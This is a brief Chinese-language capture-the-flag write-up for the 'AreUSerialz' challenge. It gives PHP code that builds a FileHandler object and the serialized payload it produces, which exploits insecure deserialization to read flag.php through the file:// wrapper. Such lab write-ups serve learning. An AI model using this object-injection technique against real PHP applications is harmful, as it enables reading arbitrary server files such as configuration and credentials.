AreUSerialz
根据代码,直接读,刚开始还以为那个过滤要绕,结果不需要。
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 
 | <?php
 
 
 class FileHandler {
 
 public $op=2;
 public $filename="file:///web/html/flag.php";
 
 function __construct() {
 $this->process();
 }
 
 public function process() {
 if($this->op == "1") {
 $this->write();
 } else if($this->op == "2") {
 $res = $this->read();
 $this->output($res);
 } else {
 $this->output("Bad Hacker!");
 }
 }
 
 private function write() {
 if(isset($this->filename) && isset($this->content)) {
 if(strlen((string)$this->content) > 100) {
 $this->output("Too long!");
 die();
 }
 $res = file_put_contents($this->filename, $this->content);
 if($res) $this->output("Successful!");
 else $this->output("Failed!");
 } else {
 $this->output("Failed!");
 }
 }
 
 private function read() {
 $res = "";
 if(isset($this->filename)) {
 $res = file_get_contents($this->filename);
 }
 return $res;
 }
 
 private function output($s) {
 echo "[Result]: <br>";
 echo $s;
 }
 
 function __destruct() {
 if($this->op === "2")
 $this->op = "1";
 $this->content = "";
 $this->process();
 }
 
 }
 $str = new FileHandler();
 echo serialize($str);
 
 | 
O:11:”FileHandler”:2:{s:2:”op”;i:2;s:8:”filename”;s:25:”file:///web/html/flag.php”;}